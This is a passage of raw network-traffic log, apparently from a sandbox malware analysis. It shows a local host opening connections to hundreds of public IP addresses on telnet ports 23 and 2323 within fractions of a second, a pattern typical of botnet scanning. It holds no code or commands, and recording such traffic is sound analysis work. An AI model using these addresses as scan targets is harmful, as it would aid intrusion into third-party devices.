                                                              Dec 11, 2024 00:43:05.304681063 CET2342034178.70.169.8192.168.2.23
                                                              Dec 11, 2024 00:43:05.304687977 CET232352202124.46.88.42192.168.2.23
                                                              Dec 11, 2024 00:43:05.304712057 CET4464823192.168.2.23154.164.127.158
                                                              Dec 11, 2024 00:43:05.304714918 CET4203423192.168.2.23178.70.169.8
                                                              Dec 11, 2024 00:43:05.304728031 CET522022323192.168.2.23124.46.88.42
                                                              Dec 11, 2024 00:43:05.304728031 CET2352152168.252.5.152192.168.2.23
                                                              Dec 11, 2024 00:43:05.304742098 CET2356978108.121.28.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.304750919 CET2351708188.233.23.109192.168.2.23
                                                              Dec 11, 2024 00:43:05.304759026 CET2337492109.211.151.116192.168.2.23
                                                              Dec 11, 2024 00:43:05.304768085 CET2359880106.168.124.208192.168.2.23
                                                              Dec 11, 2024 00:43:05.304769039 CET5215223192.168.2.23168.252.5.152
                                                              Dec 11, 2024 00:43:05.304775000 CET2345450181.2.236.47192.168.2.23
                                                              Dec 11, 2024 00:43:05.304776907 CET5170823192.168.2.23188.233.23.109
                                                              Dec 11, 2024 00:43:05.304779053 CET5697823192.168.2.23108.121.28.221
                                                              Dec 11, 2024 00:43:05.304784060 CET235895839.161.38.128192.168.2.23
                                                              Dec 11, 2024 00:43:05.304795980 CET5988023192.168.2.23106.168.124.208
                                                              Dec 11, 2024 00:43:05.304796934 CET3749223192.168.2.23109.211.151.116
                                                              Dec 11, 2024 00:43:05.304800034 CET234330068.104.79.172192.168.2.23
                                                              Dec 11, 2024 00:43:05.304810047 CET234064044.143.5.110192.168.2.23
                                                              Dec 11, 2024 00:43:05.304816961 CET5895823192.168.2.2339.161.38.128
                                                              Dec 11, 2024 00:43:05.304819107 CET232351660119.75.28.81192.168.2.23
                                                              Dec 11, 2024 00:43:05.304821968 CET4545023192.168.2.23181.2.236.47
                                                              Dec 11, 2024 00:43:05.304827929 CET2347178111.240.200.106192.168.2.23
                                                              Dec 11, 2024 00:43:05.304836035 CET235407092.89.134.111192.168.2.23
                                                              Dec 11, 2024 00:43:05.304840088 CET4330023192.168.2.2368.104.79.172
                                                              Dec 11, 2024 00:43:05.304847956 CET4064023192.168.2.2344.143.5.110
                                                              Dec 11, 2024 00:43:05.304856062 CET516602323192.168.2.23119.75.28.81
                                                              Dec 11, 2024 00:43:05.304857969 CET2335704179.33.51.146192.168.2.23
                                                              Dec 11, 2024 00:43:05.304857969 CET4717823192.168.2.23111.240.200.106
                                                              Dec 11, 2024 00:43:05.304867029 CET2358266194.119.20.212192.168.2.23
                                                              Dec 11, 2024 00:43:05.304871082 CET232358646183.110.244.6192.168.2.23
                                                              Dec 11, 2024 00:43:05.304874897 CET5407023192.168.2.2392.89.134.111
                                                              Dec 11, 2024 00:43:05.304879904 CET235083636.195.76.248192.168.2.23
                                                              Dec 11, 2024 00:43:05.304888010 CET2353202180.175.24.149192.168.2.23
                                                              Dec 11, 2024 00:43:05.304896116 CET2352882173.126.78.197192.168.2.23
                                                              Dec 11, 2024 00:43:05.304903030 CET3570423192.168.2.23179.33.51.146
                                                              Dec 11, 2024 00:43:05.304903030 CET586462323192.168.2.23183.110.244.6
                                                              Dec 11, 2024 00:43:05.304903030 CET5826623192.168.2.23194.119.20.212
                                                              Dec 11, 2024 00:43:05.304904938 CET2355148203.3.240.97192.168.2.23
                                                              Dec 11, 2024 00:43:05.304908037 CET5083623192.168.2.2336.195.76.248
                                                              Dec 11, 2024 00:43:05.304919004 CET5320223192.168.2.23180.175.24.149
                                                              Dec 11, 2024 00:43:05.304933071 CET5514823192.168.2.23203.3.240.97
                                                              Dec 11, 2024 00:43:05.304939032 CET5288223192.168.2.23173.126.78.197
                                                              Dec 11, 2024 00:43:05.305200100 CET2336482168.180.255.4192.168.2.23
                                                              Dec 11, 2024 00:43:05.305218935 CET2356224158.233.237.244192.168.2.23
                                                              Dec 11, 2024 00:43:05.305227041 CET234649690.114.247.3192.168.2.23
                                                              Dec 11, 2024 00:43:05.305236101 CET233720217.34.190.132192.168.2.23
                                                              Dec 11, 2024 00:43:05.305243969 CET3648223192.168.2.23168.180.255.4
                                                              Dec 11, 2024 00:43:05.305244923 CET2352878205.141.196.100192.168.2.23
                                                              Dec 11, 2024 00:43:05.305252075 CET5622423192.168.2.23158.233.237.244
                                                              Dec 11, 2024 00:43:05.305255890 CET2336390159.134.39.155192.168.2.23
                                                              Dec 11, 2024 00:43:05.305260897 CET4649623192.168.2.2390.114.247.3
                                                              Dec 11, 2024 00:43:05.305264950 CET3720223192.168.2.2317.34.190.132
                                                              Dec 11, 2024 00:43:05.305274963 CET2344368206.143.9.95192.168.2.23
                                                              Dec 11, 2024 00:43:05.305278063 CET5287823192.168.2.23205.141.196.100
                                                              Dec 11, 2024 00:43:05.305283070 CET3639023192.168.2.23159.134.39.155
                                                              Dec 11, 2024 00:43:05.305284977 CET235337014.165.166.7192.168.2.23
                                                              Dec 11, 2024 00:43:05.305294991 CET235794479.16.207.77192.168.2.23
                                                              Dec 11, 2024 00:43:05.305305004 CET23234950873.184.60.91192.168.2.23
                                                              Dec 11, 2024 00:43:05.305314064 CET4436823192.168.2.23206.143.9.95
                                                              Dec 11, 2024 00:43:05.305319071 CET5337023192.168.2.2314.165.166.7
                                                              Dec 11, 2024 00:43:05.305339098 CET5794423192.168.2.2379.16.207.77
                                                              Dec 11, 2024 00:43:05.305339098 CET495082323192.168.2.2373.184.60.91
                                                              Dec 11, 2024 00:43:05.305433989 CET2347256109.145.227.139192.168.2.23
                                                              Dec 11, 2024 00:43:05.305443048 CET233662063.205.162.72192.168.2.23
                                                              Dec 11, 2024 00:43:05.305452108 CET2354314193.159.232.246192.168.2.23
                                                              Dec 11, 2024 00:43:05.305459023 CET2354384102.71.47.157192.168.2.23
                                                              Dec 11, 2024 00:43:05.305466890 CET2342234168.161.205.198192.168.2.23
                                                              Dec 11, 2024 00:43:05.305469990 CET4725623192.168.2.23109.145.227.139
                                                              Dec 11, 2024 00:43:05.305476904 CET3662023192.168.2.2363.205.162.72
                                                              Dec 11, 2024 00:43:05.305476904 CET234938657.161.189.10192.168.2.23
                                                              Dec 11, 2024 00:43:05.305486917 CET2355028206.48.145.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.305489063 CET5431423192.168.2.23193.159.232.246
                                                              Dec 11, 2024 00:43:05.305495977 CET233314073.183.21.177192.168.2.23
                                                              Dec 11, 2024 00:43:05.305505991 CET2348666217.102.212.163192.168.2.23
                                                              Dec 11, 2024 00:43:05.305507898 CET5438423192.168.2.23102.71.47.157
                                                              Dec 11, 2024 00:43:05.305509090 CET4223423192.168.2.23168.161.205.198
                                                              Dec 11, 2024 00:43:05.305509090 CET4938623192.168.2.2357.161.189.10
                                                              Dec 11, 2024 00:43:05.305516005 CET232333602194.10.212.237192.168.2.23
                                                              Dec 11, 2024 00:43:05.305524111 CET2357886222.118.56.227192.168.2.23
                                                              Dec 11, 2024 00:43:05.305529118 CET5502823192.168.2.23206.48.145.221
                                                              Dec 11, 2024 00:43:05.305531979 CET3314023192.168.2.2373.183.21.177
                                                              Dec 11, 2024 00:43:05.305533886 CET23456982.98.222.149192.168.2.23
                                                              Dec 11, 2024 00:43:05.305546999 CET4866623192.168.2.23217.102.212.163
                                                              Dec 11, 2024 00:43:05.305546999 CET336022323192.168.2.23194.10.212.237
                                                              Dec 11, 2024 00:43:05.305562973 CET5788623192.168.2.23222.118.56.227
                                                              Dec 11, 2024 00:43:05.305566072 CET4569823192.168.2.232.98.222.149
                                                              Dec 11, 2024 00:43:05.305735111 CET233695827.254.114.235192.168.2.23
                                                              Dec 11, 2024 00:43:05.305743933 CET2344652222.222.175.156192.168.2.23
                                                              Dec 11, 2024 00:43:05.305754900 CET2343678150.95.151.152192.168.2.23
                                                              Dec 11, 2024 00:43:05.305772066 CET234572275.103.114.187192.168.2.23
                                                              Dec 11, 2024 00:43:05.305774927 CET3695823192.168.2.2327.254.114.235
                                                              Dec 11, 2024 00:43:05.305774927 CET4367823192.168.2.23150.95.151.152
                                                              Dec 11, 2024 00:43:05.305777073 CET4465223192.168.2.23222.222.175.156
                                                              Dec 11, 2024 00:43:05.305779934 CET235733275.52.243.161192.168.2.23
                                                              Dec 11, 2024 00:43:05.305789948 CET2355004188.34.65.40192.168.2.23
                                                              Dec 11, 2024 00:43:05.305809975 CET5733223192.168.2.2375.52.243.161
                                                              Dec 11, 2024 00:43:05.305810928 CET4572223192.168.2.2375.103.114.187
                                                              Dec 11, 2024 00:43:05.305821896 CET5500423192.168.2.23188.34.65.40
                                                              Dec 11, 2024 00:43:05.305864096 CET23235558692.8.54.109192.168.2.23
                                                              Dec 11, 2024 00:43:05.305872917 CET2360388206.36.56.3192.168.2.23
                                                              Dec 11, 2024 00:43:05.305881023 CET2334744211.205.82.76192.168.2.23
                                                              Dec 11, 2024 00:43:05.305888891 CET2355528107.180.141.177192.168.2.23
                                                              Dec 11, 2024 00:43:05.305896997 CET2335596108.202.28.32192.168.2.23
                                                              Dec 11, 2024 00:43:05.305906057 CET555862323192.168.2.2392.8.54.109
                                                              Dec 11, 2024 00:43:05.305907011 CET6038823192.168.2.23206.36.56.3
                                                              Dec 11, 2024 00:43:05.305916071 CET3474423192.168.2.23211.205.82.76
                                                              Dec 11, 2024 00:43:05.305916071 CET5552823192.168.2.23107.180.141.177
                                                              Dec 11, 2024 00:43:05.305932045 CET3559623192.168.2.23108.202.28.32
                                                              Dec 11, 2024 00:43:05.424993992 CET2345224220.129.48.46192.168.2.23
                                                              Dec 11, 2024 00:43:05.425004959 CET234991077.124.185.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.425044060 CET2342752103.153.142.22192.168.2.23
                                                              Dec 11, 2024 00:43:05.425060987 CET2353628175.80.231.151192.168.2.23
                                                              Dec 11, 2024 00:43:05.425085068 CET2348874105.166.205.106192.168.2.23
                                                              Dec 11, 2024 00:43:05.425127029 CET2347046146.84.5.149192.168.2.23
                                                              Dec 11, 2024 00:43:05.425142050 CET4887423192.168.2.23105.166.205.106
                                                              Dec 11, 2024 00:43:05.425148010 CET5362823192.168.2.23175.80.231.151
                                                              Dec 11, 2024 00:43:05.425158024 CET4991023192.168.2.2377.124.185.221
                                                              Dec 11, 2024 00:43:05.425158024 CET4522423192.168.2.23220.129.48.46
                                                              Dec 11, 2024 00:43:05.425158978 CET4275223192.168.2.23103.153.142.22
                                                              Dec 11, 2024 00:43:05.425162077 CET4704623192.168.2.23146.84.5.149
                                                              Dec 11, 2024 00:43:05.425180912 CET232341778124.162.133.167192.168.2.23
                                                              Dec 11, 2024 00:43:05.425189972 CET234265835.72.68.138192.168.2.23
                                                              Dec 11, 2024 00:43:05.425199986 CET234214881.37.97.112192.168.2.23
                                                              Dec 11, 2024 00:43:05.425216913 CET417782323192.168.2.23124.162.133.167
                                                              Dec 11, 2024 00:43:05.425226927 CET4265823192.168.2.2335.72.68.138
                                                              Dec 11, 2024 00:43:05.425234079 CET4214823192.168.2.2381.37.97.112
                                                              Dec 11, 2024 00:43:05.425338030 CET2352462122.141.143.2192.168.2.23
                                                              Dec 11, 2024 00:43:05.425348043 CET2353102166.168.215.26192.168.2.23
                                                              Dec 11, 2024 00:43:05.425355911 CET235053858.20.236.58192.168.2.23
                                                              Dec 11, 2024 00:43:05.425364017 CET2338568207.241.133.33192.168.2.23
                                                              Dec 11, 2024 00:43:05.425371885 CET2353598170.1.57.138192.168.2.23
                                                              Dec 11, 2024 00:43:05.425378084 CET5310223192.168.2.23166.168.215.26
                                                              Dec 11, 2024 00:43:05.425384045 CET5246223192.168.2.23122.141.143.2
                                                              Dec 11, 2024 00:43:05.425384045 CET5053823192.168.2.2358.20.236.58
                                                              Dec 11, 2024 00:43:05.425384998 CET233916637.185.212.133192.168.2.23
                                                              Dec 11, 2024 00:43:05.425395012 CET2355626154.1.57.97192.168.2.23
                                                              Dec 11, 2024 00:43:05.425396919 CET3856823192.168.2.23207.241.133.33
                                                              Dec 11, 2024 00:43:05.425403118 CET23236038682.148.247.0192.168.2.23
                                                              Dec 11, 2024 00:43:05.425411940 CET2349584222.114.17.25192.168.2.23
                                                              Dec 11, 2024 00:43:05.425412893 CET5359823192.168.2.23170.1.57.138
                                                              Dec 11, 2024 00:43:05.425415993 CET3916623192.168.2.2337.185.212.133
                                                              Dec 11, 2024 00:43:05.425421000 CET2353280211.219.196.28192.168.2.23
                                                              Dec 11, 2024 00:43:05.425427914 CET2336000165.65.177.55192.168.2.23
                                                              Dec 11, 2024 00:43:05.425436020 CET2337270210.65.33.66192.168.2.23
                                                              Dec 11, 2024 00:43:05.425440073 CET603862323192.168.2.2382.148.247.0
                                                              Dec 11, 2024 00:43:05.425441980 CET5562623192.168.2.23154.1.57.97
                                                              Dec 11, 2024 00:43:05.425441980 CET5328023192.168.2.23211.219.196.28
                                                              Dec 11, 2024 00:43:05.425451994 CET4958423192.168.2.23222.114.17.25
                                                              Dec 11, 2024 00:43:05.425458908 CET3600023192.168.2.23165.65.177.55
                                                              Dec 11, 2024 00:43:05.425462008 CET3727023192.168.2.23210.65.33.66
                                                              Dec 11, 2024 00:43:05.425693035 CET234595841.67.185.69192.168.2.23
                                                              Dec 11, 2024 00:43:05.425714970 CET2355950209.45.253.251192.168.2.23
                                                              Dec 11, 2024 00:43:05.425734997 CET4595823192.168.2.2341.67.185.69
                                                              Dec 11, 2024 00:43:05.425746918 CET5595023192.168.2.23209.45.253.251
                                                              Dec 11, 2024 00:43:05.425770998 CET2353826130.23.235.143192.168.2.23
                                                              Dec 11, 2024 00:43:05.425781012 CET233745865.31.218.140192.168.2.23
                                                              Dec 11, 2024 00:43:05.425787926 CET2343662146.100.42.126192.168.2.23
                                                              Dec 11, 2024 00:43:05.425805092 CET3745823192.168.2.2365.31.218.140
                                                              Dec 11, 2024 00:43:05.425812960 CET5382623192.168.2.23130.23.235.143
                                                              Dec 11, 2024 00:43:05.425815105 CET4366223192.168.2.23146.100.42.126
                                                              Dec 11, 2024 00:43:05.425849915 CET232358928105.1.160.171192.168.2.23
                                                              Dec 11, 2024 00:43:05.425858974 CET2356036119.106.229.176192.168.2.23
                                                              Dec 11, 2024 00:43:05.425865889 CET234448247.41.6.239192.168.2.23
                                                              Dec 11, 2024 00:43:05.425888062 CET589282323192.168.2.23105.1.160.171
                                                              Dec 11, 2024 00:43:05.425889969 CET5603623192.168.2.23119.106.229.176
                                                              Dec 11, 2024 00:43:05.425896883 CET4448223192.168.2.2347.41.6.239
                                                              Dec 11, 2024 00:43:05.425921917 CET2354308163.121.54.63192.168.2.23
                                                              Dec 11, 2024 00:43:05.425932884 CET234830074.24.105.13192.168.2.23
                                                              Dec 11, 2024 00:43:05.425961018 CET5430823192.168.2.23163.121.54.63
                                                              Dec 11, 2024 00:43:05.425975084 CET4830023192.168.2.2374.24.105.13
                                                              Dec 11, 2024 00:43:05.425992966 CET235584867.212.216.168192.168.2.23
                                                              Dec 11, 2024 00:43:05.426003933 CET2348050217.170.242.143192.168.2.23
                                                              Dec 11, 2024 00:43:05.426034927 CET4805023192.168.2.23217.170.242.143
                                                              Dec 11, 2024 00:43:05.426034927 CET5584823192.168.2.2367.212.216.168
                                                              Dec 11, 2024 00:43:05.426044941 CET2345740204.182.210.67192.168.2.23
                                                              Dec 11, 2024 00:43:05.426079988 CET2333628208.149.28.211192.168.2.23
                                                              Dec 11, 2024 00:43:05.426084042 CET4574023192.168.2.23204.182.210.67
                                                              Dec 11, 2024 00:43:05.426112890 CET3362823192.168.2.23208.149.28.211
                                                              Dec 11, 2024 00:43:05.426130056 CET23235425262.234.145.232192.168.2.23
                                                              Dec 11, 2024 00:43:05.426168919 CET542522323192.168.2.2362.234.145.232
                                                              Dec 11, 2024 00:43:05.426172972 CET236053499.210.212.68192.168.2.23
                                                              Dec 11, 2024 00:43:05.426183939 CET235803497.72.44.103192.168.2.23
                                                              Dec 11, 2024 00:43:05.426213026 CET5803423192.168.2.2397.72.44.103
                                                              Dec 11, 2024 00:43:05.426213980 CET6053423192.168.2.2399.210.212.68
                                                              Dec 11, 2024 00:43:05.426237106 CET2348180210.170.76.119192.168.2.23
                                                              Dec 11, 2024 00:43:05.426245928 CET235159813.34.111.219192.168.2.23
                                                              Dec 11, 2024 00:43:05.426253080 CET234375666.93.80.130192.168.2.23
                                                              Dec 11, 2024 00:43:05.426261902 CET236056687.178.201.214192.168.2.23
                                                              Dec 11, 2024 00:43:05.426278114 CET4818023192.168.2.23210.170.76.119
                                                              Dec 11, 2024 00:43:05.426280975 CET4375623192.168.2.2366.93.80.130
                                                              Dec 11, 2024 00:43:05.426285028 CET5159823192.168.2.2313.34.111.219
                                                              Dec 11, 2024 00:43:05.426287889 CET6056623192.168.2.2387.178.201.214
                                                              Dec 11, 2024 00:43:05.426377058 CET2354992219.92.141.85192.168.2.23
                                                              Dec 11, 2024 00:43:05.426415920 CET5499223192.168.2.23219.92.141.85
                                                              Dec 11, 2024 00:43:05.426827908 CET2353158113.48.239.230192.168.2.23
                                                              Dec 11, 2024 00:43:05.426867962 CET5315823192.168.2.23113.48.239.230
                                                              Dec 11, 2024 00:43:05.426892996 CET2340344118.130.228.216192.168.2.23
                                                              Dec 11, 2024 00:43:05.426935911 CET4034423192.168.2.23118.130.228.216
                                                              Dec 11, 2024 00:43:05.426961899 CET2343162196.51.130.121192.168.2.23
                                                              Dec 11, 2024 00:43:05.427000999 CET4316223192.168.2.23196.51.130.121
                                                              Dec 11, 2024 00:43:05.427009106 CET23334241.15.69.231192.168.2.23
                                                              Dec 11, 2024 00:43:05.427048922 CET3342423192.168.2.231.15.69.231
                                                              Dec 11, 2024 00:43:05.427064896 CET233923034.48.35.29192.168.2.23
                                                              Dec 11, 2024 00:43:05.427105904 CET3923023192.168.2.2334.48.35.29
                                                              Dec 11, 2024 00:43:05.427117109 CET2344468177.31.58.232192.168.2.23
                                                              Dec 11, 2024 00:43:05.427126884 CET2349892186.188.42.189192.168.2.23
                                                              Dec 11, 2024 00:43:05.427134037 CET2343390171.17.221.21192.168.2.23
                                                              Dec 11, 2024 00:43:05.427153111 CET4989223192.168.2.23186.188.42.189
                                                              Dec 11, 2024 00:43:05.427155972 CET4446823192.168.2.23177.31.58.232
                                                              Dec 11, 2024 00:43:05.427162886 CET4339023192.168.2.23171.17.221.21
                                                              Dec 11, 2024 00:43:05.427180052 CET232355858142.168.146.217192.168.2.23
                                                              Dec 11, 2024 00:43:05.427189112 CET235923899.209.160.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.427201986 CET2341818120.4.6.131192.168.2.23
                                                              Dec 11, 2024 00:43:05.427210093 CET235315861.120.160.247192.168.2.23
                                                              Dec 11, 2024 00:43:05.427215099 CET5923823192.168.2.2399.209.160.221
                                                              Dec 11, 2024 00:43:05.427222013 CET558582323192.168.2.23142.168.146.217
                                                              Dec 11, 2024 00:43:05.427231073 CET2357324160.245.188.62192.168.2.23
                                                              Dec 11, 2024 00:43:05.427241087 CET232340388103.206.41.98192.168.2.23
                                                              Dec 11, 2024 00:43:05.427243948 CET5315823192.168.2.2361.120.160.247
                                                              Dec 11, 2024 00:43:05.427243948 CET4181823192.168.2.23120.4.6.131
                                                              Dec 11, 2024 00:43:05.427244902 CET2349796143.25.242.58192.168.2.23
                                                              Dec 11, 2024 00:43:05.427253962 CET102338966135.115.123.97192.168.2.23
                                                              Dec 11, 2024 00:43:05.427263975 CET23430061.215.230.248192.168.2.23
                                                              Dec 11, 2024 00:43:05.427268028 CET5732423192.168.2.23160.245.188.62
                                                              Dec 11, 2024 00:43:05.427273035 CET235134259.106.42.102192.168.2.23
                                                              Dec 11, 2024 00:43:05.427273989 CET4979623192.168.2.23143.25.242.58
                                                              Dec 11, 2024 00:43:05.427275896 CET403882323192.168.2.23103.206.41.98
                                                              Dec 11, 2024 00:43:05.427277088 CET389661023192.168.2.23135.115.123.97
                                                              Dec 11, 2024 00:43:05.427282095 CET234670699.163.130.197192.168.2.23
                                                              Dec 11, 2024 00:43:05.427292109 CET4300623192.168.2.231.215.230.248
                                                              Dec 11, 2024 00:43:05.427303076 CET5134223192.168.2.2359.106.42.102
                                                              Dec 11, 2024 00:43:05.427306890 CET4670623192.168.2.2399.163.130.197
                                                              Dec 11, 2024 00:43:05.427369118 CET2347978181.154.229.12192.168.2.23
                                                              Dec 11, 2024 00:43:05.427377939 CET2347040112.244.146.48192.168.2.23
                                                              Dec 11, 2024 00:43:05.427382946 CET10231020083.45.30.251192.168.2.23
                                                              Dec 11, 2024 00:43:05.427411079 CET4797823192.168.2.23181.154.229.12
                                                              Dec 11, 2024 00:43:05.427412987 CET4704023192.168.2.23112.244.146.48
                                                              Dec 11, 2024 00:43:05.427421093 CET102001023192.168.2.2383.45.30.251
                                                              Dec 11, 2024 00:43:05.427752018 CET2310200142.34.247.54192.168.2.23
                                                              Dec 11, 2024 00:43:05.427762985 CET231020047.113.229.8192.168.2.23
                                                              Dec 11, 2024 00:43:05.427793980 CET1020023192.168.2.23142.34.247.54
                                                              Dec 11, 2024 00:43:05.427794933 CET231020043.68.234.204192.168.2.23
                                                              Dec 11, 2024 00:43:05.427798986 CET1020023192.168.2.2347.113.229.8
                                                              Dec 11, 2024 00:43:05.427812099 CET2310200148.222.114.156192.168.2.23
                                                              Dec 11, 2024 00:43:05.427829027 CET1020023192.168.2.2343.68.234.204
                                                              Dec 11, 2024 00:43:05.427843094 CET1020023192.168.2.23148.222.114.156
                                                              Dec 11, 2024 00:43:05.427872896 CET2310200205.226.241.38192.168.2.23
                                                              Dec 11, 2024 00:43:05.427885056 CET231020039.155.32.126192.168.2.23
                                                              Dec 11, 2024 00:43:05.427912951 CET1020023192.168.2.23205.226.241.38
                                                              Dec 11, 2024 00:43:05.427920103 CET1020023192.168.2.2339.155.32.126
                                                              Dec 11, 2024 00:43:05.427967072 CET231020031.49.42.19192.168.2.23
                                                              Dec 11, 2024 00:43:05.427974939 CET231020079.152.82.249192.168.2.23
                                                              Dec 11, 2024 00:43:05.428004026 CET1020023192.168.2.2331.49.42.19
                                                              Dec 11, 2024 00:43:05.428006887 CET1020023192.168.2.2379.152.82.249
                                                              Dec 11, 2024 00:43:05.428019047 CET2310200114.55.22.35192.168.2.23
                                                              Dec 11, 2024 00:43:05.428028107 CET23231020082.105.60.153192.168.2.23
                                                              Dec 11, 2024 00:43:05.428039074 CET2310200171.64.124.200192.168.2.23
                                                              Dec 11, 2024 00:43:05.428055048 CET1020023192.168.2.23114.55.22.35
                                                              Dec 11, 2024 00:43:05.428055048 CET102002323192.168.2.2382.105.60.153
                                                              Dec 11, 2024 00:43:05.428072929 CET1020023192.168.2.23171.64.124.200
                                                              Dec 11, 2024 00:43:05.428087950 CET23102004.158.243.44192.168.2.23
                                                              Dec 11, 2024 00:43:05.428124905 CET1020023192.168.2.234.158.243.44
                                                              Dec 11, 2024 00:43:05.428143978 CET2310200146.216.78.114192.168.2.23
                                                              Dec 11, 2024 00:43:05.428152084 CET2310200196.65.70.229192.168.2.23
                                                              Dec 11, 2024 00:43:05.428173065 CET2310200208.203.35.2192.168.2.23
                                                              Dec 11, 2024 00:43:05.428184032 CET1020023192.168.2.23196.65.70.229
                                                              Dec 11, 2024 00:43:05.428189993 CET1020023192.168.2.23146.216.78.114
                                                              Dec 11, 2024 00:43:05.428210974 CET1020023192.168.2.23208.203.35.2
                                                              Dec 11, 2024 00:43:05.428212881 CET2310200100.48.102.97192.168.2.23
                                                              Dec 11, 2024 00:43:05.428252935 CET1020023192.168.2.23100.48.102.97
                                                              Dec 11, 2024 00:43:05.428260088 CET23102009.62.187.67192.168.2.23
                                                              Dec 11, 2024 00:43:05.428268909 CET2310200138.249.90.192192.168.2.23
                                                              Dec 11, 2024 00:43:05.428298950 CET1020023192.168.2.239.62.187.67
                                                              Dec 11, 2024 00:43:05.428301096 CET1020023192.168.2.23138.249.90.192
                                                              Dec 11, 2024 00:43:05.428308010 CET2310200100.167.168.63192.168.2.23
                                                              Dec 11, 2024 00:43:05.428318024 CET23231020063.120.191.2192.168.2.23
                                                              Dec 11, 2024 00:43:05.428348064 CET102002323192.168.2.2363.120.191.2
                                                              Dec 11, 2024 00:43:05.428349972 CET1020023192.168.2.23100.167.168.63
                                                              Dec 11, 2024 00:43:05.428443909 CET2310200106.67.51.17192.168.2.23
                                                              Dec 11, 2024 00:43:05.428452969 CET2310200122.196.87.61192.168.2.23
                                                              Dec 11, 2024 00:43:05.428461075 CET231020013.47.64.15192.168.2.23
                                                              Dec 11, 2024 00:43:05.428469896 CET2310200203.129.21.251192.168.2.23
                                                              Dec 11, 2024 00:43:05.428477049 CET1020023192.168.2.23106.67.51.17
                                                              Dec 11, 2024 00:43:05.428478956 CET231020076.88.73.105192.168.2.23
                                                              Dec 11, 2024 00:43:05.428483963 CET1020023192.168.2.23122.196.87.61
                                                              Dec 11, 2024 00:43:05.428487062 CET1020023192.168.2.2313.47.64.15
                                                              Dec 11, 2024 00:43:05.428493023 CET2310200105.201.5.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.428502083 CET231020023.197.235.236192.168.2.23
                                                              Dec 11, 2024 00:43:05.428508997 CET231020034.101.159.187192.168.2.23
                                                              Dec 11, 2024 00:43:05.428509951 CET1020023192.168.2.2376.88.73.105
                                                              Dec 11, 2024 00:43:05.428508997 CET1020023192.168.2.23203.129.21.251
                                                              Dec 11, 2024 00:43:05.428531885 CET1020023192.168.2.23105.201.5.221
                                                              Dec 11, 2024 00:43:05.428533077 CET1020023192.168.2.2323.197.235.236
                                                              Dec 11, 2024 00:43:05.428544998 CET1020023192.168.2.2334.101.159.187
                                                              Dec 11, 2024 00:43:05.428865910 CET231020048.64.249.215192.168.2.23
                                                              Dec 11, 2024 00:43:05.428895950 CET232310200184.246.61.202192.168.2.23
                                                              Dec 11, 2024 00:43:05.428905010 CET1020023192.168.2.2348.64.249.215
                                                              Dec 11, 2024 00:43:05.428930044 CET23102002.241.176.60192.168.2.23
                                                              Dec 11, 2024 00:43:05.428936958 CET102002323192.168.2.23184.246.61.202
                                                              Dec 11, 2024 00:43:05.428949118 CET231020076.146.131.4192.168.2.23
                                                              Dec 11, 2024 00:43:05.428967953 CET1020023192.168.2.232.241.176.60
                                                              Dec 11, 2024 00:43:05.428970098 CET2310200109.19.141.96192.168.2.23
                                                              Dec 11, 2024 00:43:05.428987026 CET1020023192.168.2.2376.146.131.4
                                                              Dec 11, 2024 00:43:05.428996086 CET1020023192.168.2.23109.19.141.96
                                                              Dec 11, 2024 00:43:05.429012060 CET231020099.221.230.221192.168.2.23
                                                              Dec 11, 2024 00:43:05.429049969 CET1020023192.168.2.2399.221.230.221
                                                              Dec 11, 2024 00:43:05.429066896 CET231020088.63.197.138192.168.2.23
                                                              Dec 11, 2024 00:43:05.429078102 CET2310200169.175.161.7192.168.2.23
                                                              Dec 11, 2024 00:43:05.429106951 CET1020023192.168.2.2388.63.197.138
                                                              Dec 11, 2024 00:43:05.429106951 CET1020023192.168.2.23169.175.161.7
                                                              Dec 11, 2024 00:43:05.429133892 CET2310200102.239.207.99192.168.2.23
                                                              Dec 11, 2024 00:43:05.429142952 CET231020087.195.245.193192.168.2.23
                                                              Dec 11, 2024 00:43:05.429172993 CET1020023192.168.2.2387.195.245.193
                                                              Dec 11, 2024 00:43:05.429173946 CET1020023192.168.2.23102.239.207.99
                                                              Dec 11, 2024 00:43:05.429199934 CET2310200192.199.122.48192.168.2.23
                                                              Dec 11, 2024 00:43:05.429208994 CET2323102002.204.134.248192.168.2.23
                                                              Dec 11, 2024 00:43:05.429219961 CET2310200115.116.0.167192.168.2.23
                                                              Dec 11, 2024 00:43:05.429236889 CET1020023192.168.2.23192.199.122.48
                                                              Dec 11, 2024 00:43:05.429236889 CET102002323192.168.2.232.204.134.248
                                                              Dec 11, 2024 00:43:05.429260015 CET1020023192.168.2.23115.116.0.167
                                                              Dec 11, 2024 00:43:05.429306984 CET2310200195.142.211.154192.168.2.23
                                                              Dec 11, 2024 00:43:05.429316998 CET2310200156.36.4.183192.168.2.23
                                                              Dec 11, 2024 00:43:05.429326057 CET2310200220.2.123.240192.168.2.23
                                                              Dec 11, 2024 00:43:05.429342985 CET1020023192.168.2.23156.36.4.183
                                                              Dec 11, 2024 00:43:05.429346085 CET1020023192.168.2.23195.142.211.154
                                                              Dec 11, 2024 00:43:05.429359913 CET1020023192.168.2.23220.2.123.240
                                                              Dec 11, 2024 00:43:05.429369926 CET2310200158.220.90.141192.168.2.23
                                                              Dec 11, 2024 00:43:05.429378986 CET2310200101.47.137.14192.168.2.23
                                                              Dec 11, 2024 00:43:05.429406881 CET1020023192.168.2.23158.220.90.141
                                                              Dec 11, 2024 00:43:05.429409981 CET1020023192.168.2.23101.47.137.14
                                                              Dec 11, 2024 00:43:05.429428101 CET2310200220.21.108.92192.168.2.23
                                                              Dec 11, 2024 00:43:05.429436922 CET231020019.117.140.19192.168.2.23
                                                              Dec 11, 2024 00:43:05.429465055 CET1020023192.168.2.23220.21.108.92
                                                              Dec 11, 2024 00:43:05.429466009 CET1020023192.168.2.2319.117.140.19
                                                              Dec 11, 2024 00:43:05.429528952 CET23231020068.178.207.183192.168.2.23
                                                              Dec 11, 2024 00:43:05.429539919 CET2310200184.235.131.10192.168.2.23
                                                              Dec 11, 2024 00:43:05.429547071 CET231020061.56.201.31192.168.2.23
                                                              Dec 11, 2024 00:43:05.429554939 CET2310200112.158.186.213192.168.2.23
                                                              Dec 11, 2024 00:43:05.429563046 CET231020040.93.91.162192.168.2.23
                                                              Dec 11, 2024 00:43:05.429569006 CET1020023192.168.2.23184.235.131.10
                                                              Dec 11, 2024 00:43:05.429569006 CET1020023192.168.2.2361.56.201.31
